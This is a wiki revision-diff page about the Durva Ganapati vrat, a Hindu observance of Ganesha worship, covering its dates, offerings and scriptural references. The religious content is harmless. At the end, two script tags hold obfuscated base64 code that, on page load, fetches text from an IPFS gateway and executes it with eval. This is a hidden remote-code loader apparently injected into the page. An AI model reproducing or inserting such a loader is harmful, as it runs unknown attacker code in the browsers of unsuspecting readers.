Difference between revisions of "दूर्वागणपति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 2: Line 2:
 
*दो या तीन वर्षों के लिए [[श्रावण]] या [[कार्तिक]] [[शुक्ल पक्ष]] की अष्टमी को यह व्रत होता है।
 
*दो या तीन वर्षों के लिए [[श्रावण]] या [[कार्तिक]] [[शुक्ल पक्ष]] की अष्टमी को यह व्रत होता है।
 
*लाल पुष्पों, बिल्व, अपामार्ग, शमी, दूर्वा तथा तुलसी के पात्रों तथा अन्य उपचारों के साथ [[गणेश]] मूर्ति की पूजा की जाती है।
 
*लाल पुष्पों, बिल्व, अपामार्ग, शमी, दूर्वा तथा तुलसी के पात्रों तथा अन्य उपचारों के साथ [[गणेश]] मूर्ति की पूजा की जाती है।
*गणपति के दस नामों वाले मन्त्र का उच्चारण किया जाता है।<ref>हेमाद्रि (व्रतखण्ड 1, 520-523); व्रतराज (127-129, सौरपुराण से, जहाँ [[शिव]] ने स्कन्द को बताया है कि [[पार्वती देवी]] ने इसे सम्पादित किया था)</ref>  
+
*गणपति के दस नामों वाले मन्त्र का उच्चारण किया जाता है।<ref>हेमाद्रि (व्रतखण्ड 1, 520-523); व्रतराज (127-129, सौरपुराण से, जहाँ [[शिव]] ने स्कन्द को बताया है कि [[पार्वती देवी]] ने इसे सम्पादित किया था</ref>  
*रविवार को पड़ने वाली चौथ से आरम्भ होता है।<ref>गणपतिपूजन; व्रतराज (141-143, स्कन्द0 से उद्धरण); व्रतार्क (66-67)</ref>  
+
*रविवार को पड़ने वाली चौथ से आरम्भ होता है।<ref>गणपतिपूजन; व्रतराज (141-143, स्कन्द0 से उद्धरण); व्रतार्क (66-67</ref>  
*श्रावण शुक्ल पंचमी से श्रावण कृष्ण दशमी तक 16 उपचारों तथा दूर्वा, बिल्व, अपामार्ग आदि के दलों से 21 दिनों तक गणपति पूजन किया जाता है।<ref>व्रतराज (129-141)</ref>
+
*श्रावण शुक्ल पंचमी से श्रावण कृष्ण दशमी तक 16 उपचारों तथा दूर्वा, बिल्व, अपामार्ग आदि के दलों से 21 दिनों तक गणपति पूजन किया जाता है।<ref>व्रतराज (129-141</ref>
 
+
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:49, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • do ya tin varshoan ke lie shravan ya kartik shukl paksh ki ashtami ko yah vrat hota hai.
  • lal pushpoan, bilv, apamarg, shami, doorva tatha tulasi ke patroan tatha any upacharoan ke sath ganesh moorti ki pooja ki jati hai.
  • ganapati ke das namoan vale mantr ka uchcharan kiya jata hai.[1]
  • ravivar ko p dane vali chauth se arambh hota hai.[2]
  • shravan shukl panchami se shravan krishna dashami tak 16 upacharoan tatha doorva, bilv, apamarg adi ke daloan se 21 dinoan tak ganapati poojan kiya jata hai.[3]


tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 520-523); vrataraj (127-129, saurapuran se, jahaan shiv ne skand ko bataya hai ki parvati devi ne ise sampadit kiya tha
  2. ganapatipoojan; vrataraj (141-143, skand0 se uddharan); vratark (66-67
  3. vrataraj (129-141

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>